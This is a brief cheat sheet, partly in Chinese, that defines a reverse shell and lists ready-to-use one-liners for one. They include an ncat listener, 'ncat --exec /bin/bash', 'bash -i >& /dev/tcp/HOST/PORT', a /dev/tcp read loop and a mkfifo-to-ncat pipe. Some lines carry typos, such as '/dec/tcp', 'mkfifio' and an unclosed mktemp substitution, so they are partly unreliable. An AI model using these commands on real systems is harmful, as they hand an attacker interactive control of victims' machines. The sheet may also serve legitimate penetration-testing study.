reverse shell

反弹shell（reverse shell），就是攻击端（本机）监听在某TCP/UDP端口，受害端（目标服务器）发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。

ncat:

attacker

ncat --listen --source-port 5555 --keep-open

victim

ncat --exec /bin/bash IP 5555 

bash -i >& /dev/tcp/intrinsic/5555 0<&1

This snippet runs a new interactive instance of bash (bash -i), on a TCP connection to the specified port on the specified host which is created for the duration of the bash process. Standard output and standard error are sent through this connection

(>& /dec/tcp/HOST/PORT), and standard input is read through this connection (0>&1) this should be 0<&1, but 0>&1 works too

echo b c > /dev/tcp/HOST/PORT

exec 5<> /dev/tcp/HOST/PORT

cat <&5 | while read line; do
    $line >&5 2>&1
done

file=$(mktemp --dry-run -p /tmp --suffix .pipe tmp.XXX

mkfifio --mode=700 $file

cat $file | bash -i 2>&1 | ncat HOST PORT > $file

cat output pipe content to bash, bash execute, nc pipe the output to pipe